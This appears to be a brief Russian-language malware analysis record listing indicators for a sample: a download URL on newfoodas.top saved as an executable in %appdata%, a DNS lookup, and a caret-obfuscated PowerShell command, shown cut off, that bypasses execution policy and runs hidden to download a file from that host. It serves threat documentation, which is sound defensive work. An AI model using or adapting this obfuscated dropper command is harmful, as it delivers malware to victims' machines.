Техническая информация
- http://newfoodas.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "Po^wER^s^hEl^l.ExE ^-ex^EcU^t^i^O^n^po^l^I^cY ^BY^pAs^s -noP^RO^FI^Le ^-wi^n^D^Ows^TYLE^ H^i^ddE^n^ (Ne^W-^o^BJEcT ^Sy^s^tem.N^E^t^.^w^Eb^Cl^IEnt^).dO^WnlOADfI^lE^('http://newfoo...
- DNS ASK ne###odas.top
- '<SYSTEM32>\cmd.exe' /C "Po^wER^s^hEl^l.ExE ^-ex^EcU^t^i^O^n^po^l^I^cY ^BY^pAs^s -noP^RO^FI^Le ^-wi^n^D^Ows^TYLE^ H^i^ddE^n^ (Ne^W-^o^BJEcT ^Sy^s^tem.N^E^t^.^w^Eb^Cl^IEnt^).dO^WnlOADfI^lE^('http://newfoo...' (со скрытым окном)